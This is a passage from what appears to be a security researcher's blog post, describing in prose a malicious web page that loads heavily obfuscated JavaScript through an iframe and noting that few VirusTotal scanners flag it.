It doesn’t stop there though; in a further effort the page embeds a javascript in an IFrame. And behold! We see the expected obfuscation code. So, in the end this isn’t really much different to previous sightings. I guess this strategy is still paying off for the crims behind it. It’s a sad indictment of the state of Internet security and security awareness that even after so many months this seemingly still works.

This time the javascript obfuscation is far more complex than others I’ve seen. Rather than a couple of simple translations we have several loops employing shifts and a variety of other bitwise operators (didn’t even know ECMA had an LSR operator). I guess they’ve invested some of their research time into this aspect of their code. At the moment only three of the virustotal.com scanners have anything to say about this and that’s just something along the lines of “generic obfuscated HTML”.

I wish people an infection-free Christmas. Have a good one.